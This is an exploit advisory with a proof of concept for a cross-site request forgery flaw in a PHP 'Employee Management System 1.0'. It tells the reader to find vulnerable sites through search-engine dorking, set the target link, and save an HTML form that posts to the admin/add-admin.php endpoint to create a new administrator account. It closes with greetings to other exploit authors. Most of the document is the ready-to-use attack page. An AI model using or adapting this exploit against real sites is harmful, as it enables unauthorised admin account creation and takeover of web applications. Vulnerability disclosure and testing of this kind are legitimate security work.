Headline
Employee Management System 1.0 Cross Site Request Forgery
Employee Management System version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================
| # Title : Employee Management System v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/16999/employee-management-system.html |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 9.
[+] Set the target site link Save changes and apply .
[+] infected file : employee_akpoly/Admin/add-admin.php.
[+] http://127.0.0.1/employee_akpoly/Admin/add-admin.php.
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Add Admin</title>
</head>
<body>
<form action="http://127.0.0.1/employee_akpoly/Admin/add-admin.php" method="POST" enctype="multipart/form-data">
<label for="txtusername">Username:</label>
<input type="text" id="txtusername" name="txtusername" required><br><br>
<label for="txtfullname">Full Name:</label>
<input type="text" id="txtfullname" name="txtfullname" required><br><br>
<label for="txtpassword">Password:</label>
<input type="password" id="txtpassword" name="txtpassword" required><br><br>
<label for="txtphone">Phone Number:</label>
<input type="text" id="txtphone" name="txtphone" required><br><br>
<label for="avatar">Avatar:</label>
<input type="file" id="avatar" name="avatar" accept="image/*"><br><br>
<button type="submit" name="btncreate">Create</button>
</form>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================